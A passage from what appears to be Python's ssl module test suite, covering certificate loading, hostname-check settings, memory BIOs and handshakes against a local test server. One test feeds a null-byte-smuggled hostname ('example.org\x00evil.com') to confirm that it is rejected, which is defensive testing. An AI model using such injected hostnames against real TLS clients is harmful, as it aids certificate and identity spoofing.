self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
